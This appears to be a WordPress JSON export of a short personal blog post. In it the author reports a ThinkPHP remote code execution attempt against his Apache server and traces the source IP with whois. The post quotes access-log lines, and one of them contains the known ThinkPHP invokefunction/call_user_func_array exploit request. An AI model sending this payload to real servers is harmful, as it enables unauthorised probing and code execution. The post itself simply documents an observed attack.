{"id":965,"date":"2020-04-25T13:30:47","date_gmt":"2020-04-25T17:30:47","guid":{"rendered":"https:\/\/blog.lufamily.ca\/kang\/?p=965"},"modified":"2020-04-25T13:30:50","modified_gmt":"2020-04-25T17:30:50","slug":"evidence-of-an-attack","status":"publish","type":"post","link":"https:\/\/blog.lufamily.ca\/kang\/2020\/04\/25\/evidence-of-an-attack\/","title":{"rendered":"Evidence of an Attack"},"content":{"rendered":"\n<p>Today I went about performing my regular server maintenance update and noticed an IP address <code>202.107.188.12<\/code> hitting my Apache web server. Out of pure curiosity I thought I lookup this IP address. After a quick <code>whois<\/code> command, I found out it came from Xinjiang Province, China, specifically from the <a rel=\"noreferrer noopener\" href=\"http:\/\/www.chinanet-online.com\" target=\"_blank\">http:\/\/www.chinanet-online.com<\/a> ISP.<\/p>\n\n\n\n<p>After more investigation, I noticed that this particular visitor was attempting a <a rel=\"noreferrer noopener\" href=\"https:\/\/securitynews.sonicwall.com\/xmlpost\/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited\/\" target=\"_blank\">ThinkPHP remote code execution<\/a> attack. I don&#8217;t run the ThinkPHP framework. Below is the log recording its attempt.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>202.107.188.12 - - &#91;25\/Apr\/2020:12:58:01 -0400] \"GET \/TP\/public\/index.php HTTP\/1.1\" 302 499 \"-\" \"Mozilla\/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko\/20100115 Firefox\/3.6)\"\n202.107.188.12 - - &#91;25\/Apr\/2020:12:58:05 -0400] \"GET \/TP\/public\/index.php?s=index\/\\\\think\\\\app\/invokefunction&amp;function=call_user_func_array&amp;vars&#91;0]=phpinfo&amp;vars&#91;1]&#91;]=1 HTTP\/1.1\" 302 695 \"-\" \"Mozilla\/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko\/20100115 Firefox\/3.6)\"\n202.107.188.12 - - &#91;25\/Apr\/2020:12:58:08 -0400] \"POST \/TP\/public\/index.php?s=captcha HTTP\/1.1\" 302 519 \"-\" \"Go-http-client\/1.1\"\n202.107.188.12 - - &#91;25\/Apr\/2020:12:58:11 -0400] \"GET \/ HTTP\/1.1\" 302 499 \"-\" \"Mozilla\/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko\/20100115 Firefox\/3.6)\"<\/code><\/pre>\n\n\n\n<p>I have always wondered how many bad actors are out there and whether these bad people will end up attacking my stuff.  Well now I know, experienced first hand.<\/p>\n\n\n\n<p>It is a scary place out there.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today I went about performing my regular server maintenance update and noticed an IP address 202.107.188.12 hitting my Apache web server. Out of pure curiosity I thought I lookup this IP address. After a quick whois command, I found out it came from Xinjiang Province, China, specifically from the http:\/\/www.chinanet-online.com ISP. After more investigation, I &hellip; <a href=\"https:\/\/blog.lufamily.ca\/kang\/2020\/04\/25\/evidence-of-an-attack\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Evidence of an Attack&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-965","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p7V6i8-fz","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/comments?post=965"}],"version-history":[{"count":1,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/965\/revisions"}],"predecessor-version":[{"id":966,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/965\/revisions\/966"}],"wp:attachment":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/media?parent=965"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/categories?post=965"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/tags?post=965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}